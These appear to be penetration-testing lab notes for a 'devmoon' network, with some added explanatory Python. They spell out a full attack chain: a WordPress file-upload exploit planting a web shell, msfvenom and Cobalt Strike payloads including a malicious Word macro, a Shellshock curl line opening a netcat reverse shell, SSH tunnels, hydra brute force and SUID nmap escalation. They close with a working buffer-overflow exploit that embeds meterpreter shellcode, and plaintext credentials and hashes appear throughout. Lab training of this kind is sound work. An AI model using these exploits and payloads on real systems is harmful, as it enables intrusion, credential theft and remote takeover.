WordPress 4.1
Contact Form plugin
Slideshow Gallery 1.4.7 (AFU = arbitrary file upload)
theme: Spacious v1.2.2
WordPress user: devmoon

PHP
phpMyAdmin
SquirrelMail
Apache 2.4.7
:81 ClearOS
wp-content/uploads


nikto -h http://devmoon.lab
wpscan --url devmoon.lab --enumerate p      (p = plugins, u = users; --enumerate p,u gives both outputs below)

[!] Title: DB Backup <= 4.5 - Path Traversal File Access
Reference: https://wpvulndb.com/vulnerabilities/7726
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9119

[+] Identified the following 1 user/s:
+----+---------+---------+
| Id | Login | Name |
+----+---------+---------+
| 1 | devmoon | devmoon |
+----+---------+---------+

In the web root, wp-config.php holds the database credentials:
/** MySQL database username */
define('DB_USER', 'wordpressuser');

/** MySQL database password */
define('DB_PASSWORD', 'c00n3ctm3n0w');


phpMyAdmin, wp_users row:
devmoon $P$BGbV2v66mwgwFidm.GWX8PmHLEgra41 devmoon [email protected] =>> KALAMAJA 123 || 4e40128eab9b4358ab5ae6ed5d4b34bd

hash-identifier - shows the hash type ($P$ = phpass, the WordPress default)

-- edit the row: put the new plaintext password in user_pass, pick MD5 from the Function dropdown, Go.
   WordPress still accepts a bare MD5 in user_pass (legacy format) and rehashes it to phpass on the next successful login, so this resets the account without cracking the phpass hash.


weevely generate Kalamaja123at bckdoor.php        (weevely generate <password> <output file>)

https://www.exploit-db.com/exploits/34681/ > download the Slideshow Gallery arbitrary file upload exploit
-- upload the generated shell with it: python 34681.txt -t http://devmoon.lab -u devmoon -p Kalamaja123 -f bckdoor.php

connect with weevely: weevely http://devmoon.lab/wp-content/uploads/slideshow-gallery/bckdoor.php <password>

/var/log/..

ls -laht | head -5
chkrootkit.log

Searching for Suckit rootkit... Warning: /sbin/init INFECTED
(chkrootkit's Suckit test is a well-known false positive against /sbin/init on many distributions; verify the binary against the package manager's checksums before acting on it)

metasploit

linux/x86/shell_reverse_tcp
1) normal
2) LPORT 8080, format elf > saved as a file named "update"

upload the update file with the weevely console:
:upload file <local path> <remote path>     (weevely3: :file_upload <local> <remote>)
chmod +x the file and run it
after the session is up, remove the +x bit again

administrator:$6$9bILNNZI$mDJYYh7ZtcWBGN236dfI1mUlKd3VNlxXOhe5ciRm.Ogh2e5IjovT47AIVwmQI1E3bDJop3cb1giZAQUe8HvD81:16507:0:99999:7:::

cewl builds a wordlist from the words on the target site: cewl -w wordlist.txt http://devmoon.lab   (cewl --help for options)
create hash.txt with the complete shadow line above.

john --wordlist=wordlist.txt hash.txt

On the web server itself:

netstat -tulpn
ssh listening :

make interactive shell : python -c 'import pty; pty.spawn("/bin/bash")'

reverse tunnel (run on the web server; exposes the internal host's SSH on port 2222 of the attacker box): ssh [email protected] -R 2222:192.168.10.5:22

SquirrelMail :

$clientdb_host = 'localhost';
$clientdb_user = 'root';
$clientdb_password = 'c00n3ctm3';   (stored hash: $1$Uds55/wz$d4kf9qF8OjSY/A8CeWNUw1)


reverse tunnel for ISPConfig on 8080 (same pattern; as written this line forwards the internal SSH port 22 to local 2222, change the port pair to reach 8080):

ssh [email protected] -R 2222:192.168.10.5:22


[email protected] [email protected] 4e40128eab9b4358ab5ae6ed5d4b34bd
[email protected] [email protected] $1$FdcXZOFC$p469BrVwfLN1jxfKASmo./
[email protected] [email protected] $1$zCp082rI$QoxF4zTGuK6pug3xaAQSe/
[email protected] [email protected] $1$uwruPrzH$TbW4lBU8EC4MXCVks2cX41
[email protected] [email protected] $1$3RdZGuG3$ZbeY39AyOKFz8t0RcCh3g/

hashes are salted ($1$ = MD5-crypt, 8-character salt between the second and third $), so each one has to be cracked on its own.
instead, generate a new salted hash for a user and write it over the old one:

openssl passwd -1 Kalamaja123
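As an added example (not from the original notes), here is the $1$ MD5-crypt scheme that openssl passwd -1 implements, in pure Python: it makes the salt concrete and gives a verify() for testing a candidate password against one of the stored hashes above without openssl. The algorithm follows the original FreeBSD crypt_md5; the random salt generation and verify() are my own additions.

```python
#!/usr/bin/env python3
"""MD5-crypt ("$1$") as produced by `openssl passwd -1`, in pure Python.

Added example, not from the original notes.  The algorithm follows the
original FreeBSD crypt_md5; random salt generation and verify() are additions.
"""
import hashlib
import secrets
from typing import Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"
ROUNDS = 1000


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: low 6 bits first, `count` characters."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5_crypt(password: bytes, salt: Optional[str] = None) -> str:
    """Return "$1$<salt>$<22 chars>"; a fresh 8-char salt is drawn when none is given."""
    if salt is None:
        salt = "".join(secrets.choice(ITOA64) for _ in range(8))
    salt = salt[:8]
    salt_b = salt.encode()

    ctx = hashlib.md5(password + MAGIC + salt_b)
    alt = hashlib.md5(password + salt_b + password).digest()
    # Feed `alt` once per 16 bytes of password (the remainder for the tail).
    for remaining in range(len(password), 0, -16):
        ctx.update(alt[:min(16, remaining)])
    # For each bit of the password length: a NUL for a 1 bit, the first password byte for a 0 bit.
    bits = len(password)
    while bits:
        ctx.update(b"\x00" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()

    # 1000 rounds; the round number decides what goes in and in which order (key stretching).
    for i in range(ROUNDS):
        c = hashlib.md5()
        c.update(password if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()

    # Output bytes are interleaved in a fixed order, 3 bytes -> 4 characters, then byte 11 alone.
    encoded = ""
    for a, b, c3 in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c3], 4)
    encoded += _to64(final[11], 2)
    return "$1$%s$%s" % (salt, encoded)


def verify(password: bytes, stored: str) -> bool:
    """Re-hash `password` with the salt taken from `stored` and compare in constant time."""
    if not stored.startswith("$1$"):
        raise ValueError("not an MD5-crypt hash")
    salt = stored[3:].split("$", 1)[0]
    return secrets.compare_digest(md5_crypt(password, salt), stored)


if __name__ == "__main__":
    print(md5_crypt(b"Kalamaja123"))                                      # replacement hash, new salt each run
    print(verify(b"c00n3ctm3", "$1$Uds55/wz$d4kf9qF8OjSY/A8CeWNUw1"))      # test the SquirrelMail credential
```

Because the salt goes into every one of the 1000 rounds, the same password hashed under two salts gives unrelated strings; that is why a wordlist run against the five mail-user hashes above costs five times the work, and why a replacement hash must be generated with its own salt rather than copied from another user.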

Add an HTTP beacon (Cobalt Strike) and generate a Word macro;
embed it in the CV document.


PowerUp (harmj0y)
use the beacon upload command to push the PowerShell script and check the host for privilege-escalation weaknesses.

shell sc qc "Mobile Partner, RunOuc"      (shows the service configuration, including its binary path)

generate a stageless (S) exe and drop it in the Mobile Partner target folder.

Restart-Computer -Force

add a listener for meterpreter. getsystem. dump hashes. ARP scan. scan each discovered host individually.

add a VPN pivot to target 103 (Cobalt Strike covert VPN):
create the phear0 interface

on the local kali terminal: dhclient phear0

echo "nameserver 8.8.8.8" >> /etc/resolv.conf

chattr +i /etc/resolv.conf (sets the immutable attribute so dhclient cannot overwrite the file); chattr -i to remove it

nmap -sV 192.168.0.2 to discover the DC

web on 192.168.0.2: matrix page.

nikto -h 192.168.0.2 to discover -

QR code = base64 : answer : I%20see%20shellshock%20...%20everywhere...

add a netcat listener
nc -lvp 8081

in another window:
curl -H "User-Agent: () { :; }; /bin/nc 10.10.10.201 8081 -e /bin/bash & " http://192.168.0.2/cgi-bin/
(the -e flag needs a netcat build that supports it, e.g. nc.traditional; the OpenBSD nc shipped on most distributions does not)

in the netcat window, upgrade the shell:
python -c 'import pty; pty.spawn("/bin/bash")'
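The defender's view of the curl request above, as an added example that is not part of the original notes: a parser for Apache combined-format access logs with a check for the "() {" function-import trigger behind CVE-2014-6271 in the CGI-exported fields. The log lines are constructed for the example; the first one carries the exact User-Agent from the curl command.

```python
#!/usr/bin/env python3
"""Spot Shellshock (CVE-2014-6271) probes in Apache access logs.

Added example, not from the original notes.  SAMPLE_LOG is constructed data.
"""
import re
from typing import Dict, List, Optional

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The bug: bash imported any environment value starting with "() {" as a function
# and kept executing whatever followed the closing brace.  Capture that trailer.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;?\s*(?P<cmd>.*)$')

SAMPLE_LOG = [  # constructed sample data, not a real capture
    '10.10.10.201 - - [10/Mar/2015:14:02:11 +0200] "GET /cgi-bin/ HTTP/1.1" 500 612 "-" '
    '"() { :; }; /bin/nc 10.10.10.201 8081 -e /bin/bash & "',
    '192.168.0.50 - - [10/Mar/2015:14:03:01 +0200] "GET /index.html HTTP/1.1" 200 1532 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/36.0"',
    '10.10.10.201 - - [10/Mar/2015:14:05:42 +0200] "GET /cgi-bin/status HTTP/1.1" 200 98 '
    '"() { :;}; echo; /bin/cat /etc/passwd" "curl/7.38.0"',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def shellshock_hits(lines) -> List[Dict[str, str]]:
    """One record per line whose User-Agent, Referer or request line carries a Shellshock payload."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("ua", "referer", "request"):   # every header mod_cgi exports is a vector
            m = SHELLSHOCK_RE.search(rec[field])
            if m:
                hits.append({"src": rec["src"], "time": rec["time"], "field": field,
                             "request": rec["request"], "cmd": m.group("cmd").strip()})
                break
    return hits


if __name__ == "__main__":
    for h in shellshock_hits(SAMPLE_LOG):
        print("%(time)s %(src)s via %(field)s -> %(cmd)s" % h)
```

Run it against a real access log with `shellshock_hits(open("/var/log/apache2/access.log"))`; the returned command strings are the same ones the attacker put after the closing brace, so the reverse-shell target (here 10.10.10.201:8081) falls straight out of the log.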

crypo.com to decode the password stored in
/etc/zentyal/old/

Zentyal: 192.168.0.2:8443
Administrator
KvMDTbdmUr2yOnJCZa: devm00ndch3r3

create a new domain-admin user.


ssh [email protected]

.ssh/authorized_keys contains:
denis@daniel-devmoon-linux

in kali: hydra -l denis -t 4 -P wordlist.txt -vV 192.168.0.217 ssh

user: denis
password: deniboy

ssh [email protected]
cat hint.hoha

Download LinEnum.sh from GitHub.

upload it via Cobalt Strike
chmod +x LinEnum.sh
run ./LinEnum.sh -t

this shows that nmap has the SUID bit set,
which means anything nmap executes runs as the file owner, root.

nmap --script <NSE script that spawns a shell>
or better
nmap --interactive   (interactive mode; only present in old nmap versions, up to 5.21)
which gives an interactive prompt:
!whoami

run
!sh
gives a plain shell; once in sh the ! prefix is no longer needed.
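The check LinEnum ran to find the SUID nmap, written out as an added example (not LinEnum's code and not from the original notes): walk the filesystem, keep regular files with the setuid or setgid bit, and flag the root-owned SUID ones whose name is a known shell escape. The SHELL_ESCAPES list is an assumption, a small illustrative subset; make_demo_tree() builds a constructed sample directory so the script runs without a vulnerable host.

```python
#!/usr/bin/env python3
"""Locate SUID/SGID binaries and flag the ones that are known shell escapes.

Added example, not LinEnum's code.  SHELL_ESCAPES is an illustrative subset
(assumption, not exhaustive); make_demo_tree() creates constructed sample files.
"""
import os
import re
import stat
import tempfile
from typing import Dict, List

SHELL_ESCAPES = {"nmap", "find", "vim", "bash", "python", "perl", "less", "awk", "env"}
SKIP_PREFIXES = ("/proc", "/sys", "/dev")   # pseudo filesystems: nothing to gain, lots to stat


def find_setid(root: str = "/") -> List[Dict]:
    """Walk `root` and return regular files with the setuid or setgid bit set."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(SKIP_PREFIXES):
            dirnames[:] = []            # prune the walk below this directory
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)     # lstat: never follow symlinks
            except OSError:
                continue                # unreadable entries are skipped, as find(1) does
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append({
                    "path": path,
                    "suid": bool(st.st_mode & stat.S_ISUID),
                    "sgid": bool(st.st_mode & stat.S_ISGID),
                    "uid": st.st_uid,
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                })
    return sorted(hits, key=lambda h: h["path"])


def escalation_candidates(hits: List[Dict], owner_uid: int = 0) -> List[Dict]:
    """SUID files owned by `owner_uid` (root by default) whose name is a known shell escape."""
    out = []
    for h in hits:
        base = re.sub(r"[\d.]+$", "", os.path.basename(h["path"]))   # python3.8 -> python
        if h["suid"] and h["uid"] == owner_uid and base in SHELL_ESCAPES:
            out.append(h)
    return out


def make_demo_tree() -> str:
    """Constructed sample tree (not a real system): a SUID 'nmap' next to a normal file."""
    d = tempfile.mkdtemp(prefix="suid-demo-")
    for name, mode in (("nmap", 0o4755), ("plain", 0o755)):
        p = os.path.join(d, name)
        with open(p, "wb"):
            pass
        os.chmod(p, mode)
    return d


if __name__ == "__main__":
    demo = make_demo_tree()
    found = find_setid(demo)
    for h in found:
        print(h["mode"], h["uid"], h["path"])
    # On a real host: found = find_setid("/"); escalation_candidates(found) with owner_uid=0.
    print("candidates:", [h["path"] for h in escalation_candidates(found, owner_uid=os.getuid())])
```

The demo files are owned by the current user, so the candidates call passes that uid; on a target the default owner_uid=0 is what matters, since a SUID binary owned by anyone else only buys you that account.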

In daniel's folder there is a stored private key. Save it.
Then look at daniel's history.
He has logged into server 192.168.0.13 as admin with that private key.

On that server, netstat shows "moloch" (packet capture UI) on 192.168.0.13:8005
filter: port == 21

visible:

session from 192.168.0.217 to 192.168.0.11

USER denis
PASS denimovehere

we notice that the backup server has been moved.
on denis's machine look at the history (exit this mode first)

the history shows an ftp login to 10.20.10.20

ftp login as denis/denismovehere succeeds.

note: use samba

smbclient -L 10.20.10.20 -U denis

smbclient //10.20.10.20/smbdenis -U denis

prompt        (toggles the per-file confirmation off)
mget *        (while inside the "stuff" folder)

make a new folder in kali.

scp * [email protected]:/root/smbdaniel


============================================
============================================

Exploit Development

Buffer Overflow



/usr/share/metasploit-framework/tools/pattern_create.rb 1000
# creates a 1000-byte non-repeating pattern (newer Metasploit: tools/exploit/pattern_create.rb -l 1000)

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

put the pattern into fuzzer.py as the value sent in USER

test:
EIP = 37684136

now run /usr/share/metasploit-framework/tools/pattern_offset.rb 37684136
result: 230   (bytes before the saved return address; 0x37684136 is the little-endian read of "6Ah7" at pattern offset 230)


EIP = "\x53\x93\x42\x7E"   (return address written in little-endian byte order)

generate the payload in the kali terminal:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.201 LPORT=443 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f python
(bad chars: NUL, LF and CR would end the FTP command line early)
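What the two Ruby tools compute, re-implemented as an added example (not the Metasploit tools' source and not from the original notes): pattern_create() builds the Aa0Aa1... sequence, pattern_offset() shows why EIP=0x37684136 means offset 230, and build_buffer() lays out filler | EIP | NOP sled | shellcode | padding the way fuzzer.py does, refusing shellcode that contains the bad characters. The return address 0x7E429353 is the page's EIP bytes read back as an integer, and the int3 "shellcode" in the usage line is a stand-in, not a real payload.

```python
#!/usr/bin/env python3
"""pattern_create / pattern_offset / buffer layout, re-implemented in Python.

Added example, not the Metasploit tools' source.  0x7E429353 is the page's
EIP bytes read back as an integer; the int3 shellcode is a stand-in.
"""
import string
import struct
from typing import List, Tuple

BADCHARS = b"\x00\x0a\x0d"   # NUL, LF, CR: would terminate the FTP USER line early


def pattern_create(length: int) -> bytes:
    """First `length` bytes of Aa0Aa1...Aa9Ab0...Zz9 (every 4-byte window is unique up to 20280 bytes)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset of the 4 bytes that landed in EIP, or -1 if the value is not from the pattern.

    The debugger shows EIP as a 32-bit little-endian value, so the bytes that sat on
    the stack are struct.pack('<I', eip): 0x37684136 -> b'6Ah7'.
    """
    return pattern.find(struct.pack("<I", eip))


def check_badchars(shellcode: bytes, bad: bytes = BADCHARS) -> List[Tuple[int, int]]:
    """(offset, byte) pairs in `shellcode` that are on the bad-character list."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def build_buffer(offset: int, ret: int, shellcode: bytes,
                 total: int = 1000, nops: int = 32) -> bytes:
    """filler | saved-EIP overwrite | NOP sled | shellcode | padding, exactly `total` bytes."""
    bad = check_badchars(shellcode)
    if bad:
        raise ValueError("bad characters in shellcode at %r" % bad)
    buf = b"I" * offset + struct.pack("<I", ret) + b"\x90" * nops + shellcode
    if len(buf) > total:
        raise ValueError("payload needs %d bytes, only %d available" % (len(buf), total))
    return buf + b"B" * (total - len(buf))


if __name__ == "__main__":
    pat = pattern_create(1000)
    off = pattern_offset(pat, 0x37684136)
    print("EIP 0x37684136 -> bytes %r at offset %d" % (struct.pack("<I", 0x37684136), off))
    demo = build_buffer(off, 0x7E429353, b"\xcc" * 8)        # int3 x8 as a stand-in payload
    print("buffer: %d bytes, EIP bytes %r" % (len(demo), demo[off:off + 4]))
```

Two checks worth keeping from this: pattern_offset() returning -1 means the crash value was not taken from your pattern (a partial overwrite or a different buffer), and the bad-character refusal catches a payload regenerated without the -b list before it silently truncates on the wire.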





autologin metasploit module

pattern_offset.rb 'value'


1: get fuzzer.py from http://10.17.10.

http://10.10.10.201:81/DevMoon.exe

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤


#!/usr/bin/env python3
# fuzzer.py - sends the overflow in the FTP USER command.
# Python 3 port of the original; the \x escapes lost their backslashes in the
# page extraction and are restored here.

import socket

garbage1 = b"I" * 230              # filler up to the saved return address (pattern_offset.rb: 230)
EIP = b"\x53\x93\x42\x7E"          # overwrites the saved return address (little-endian)
nopsled = b"\x90" * 32             # NOP sled the return address lands in, leading into the shellcode

# msfvenom windows/meterpreter/reverse_tcp, x86/shikata_ga_nai, bad chars \x00\x0a\x0d
buf = b""
buf += b"\xd9\xc1\xb8\xaa\x7e\xab\x6e\xd9\x74\x24\xf4\x5f\x31"
buf += b"\xc9\xb1\x47\x31\x47\x18\x03\x47\x18\x83\xef\x56\x9c"
buf += b"\x5e\x92\x4e\xe3\xa1\x6b\x8e\x84\x28\x8e\xbf\x84\x4f"
buf += b"\xda\xef\x34\x1b\x8e\x03\xbe\x49\x3b\x90\xb2\x45\x4c"
buf += b"\x11\x78\xb0\x63\xa2\xd1\x80\xe2\x20\x28\xd5\xc4\x19"
buf += b"\xe3\x28\x04\x5e\x1e\xc0\x54\x37\x54\x77\x49\x3c\x20"
buf += b"\x44\xe2\x0e\xa4\xcc\x17\xc6\xc7\xfd\x89\x5d\x9e\xdd"
buf += b"\x28\xb2\xaa\x57\x33\xd7\x97\x2e\xc8\x23\x63\xb1\x18"
buf += b"\x7a\x8c\x1e\x65\xb3\x7f\x5e\xa1\x73\x60\x15\xdb\x80"
buf += b"\x1d\x2e\x18\xfb\xf9\xbb\xbb\x5b\x89\x1c\x60\x5a\x5e"
buf += b"\xfa\xe3\x50\x2b\x88\xac\x74\xaa\x5d\xc7\x80\x27\x60"
buf += b"\x08\x01\x73\x47\x8c\x4a\x27\xe6\x95\x36\x86\x17\xc5"
buf += b"\x99\x77\xb2\x8d\x37\x63\xcf\xcf\x5f\x40\xe2\xef\x9f"
buf += b"\xce\x75\x83\xad\x51\x2e\x0b\x9d\x1a\xe8\xcc\xe2\x30"
buf += b"\x4c\x42\x1d\xbb\xad\x4a\xd9\xef\xfd\xe4\xc8\x8f\x95"
buf += b"\xf4\xf5\x45\x39\xa5\x59\x36\xfa\x15\x19\xe6\x92\x7f"
buf += b"\x96\xd9\x83\x7f\x7d\x72\x29\x85\x15\x77\xa4\x8f\x2c"
buf += b"\xef\xba\x8f\xaf\x4b\x33\x69\xc5\xbb\x12\x21\x71\x25"
buf += b"\x3f\xb9\xe0\xaa\x95\xc7\x22\x20\x1a\x37\xec\xc1\x57"
buf += b"\x2b\x98\x21\x22\x11\x0e\x3d\x98\x3c\xae\xab\x27\x97"
buf += b"\xf9\x43\x2a\xce\xcd\xcb\xd5\x25\x46\xc5\x43\x86\x30"
buf += b"\x2a\x84\x06\xc0\x7c\xce\x06\xa8\xd8\xaa\x54\xcd\x26"
buf += b"\x67\xc9\x5e\xb3\x88\xb8\x33\x14\xe1\x46\x6a\x52\xae"
buf += b"\xb9\x59\x62\x92\x6f\xa7\x10\xfa\xb3"
garbage2 = b"B" * (1000 - len(garbage1 + EIP + nopsled + buf))   # pad to the 1000 bytes that caused the crash

payload = garbage1 + EIP + nopsled + buf + garbage2

print("Sending USER with %d bytes" % len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.10.200', 21))
s.recv(1024)                       # banner
s.send(b'USER ' + payload + b'\r\n')
s.recv(1024)
s.close()
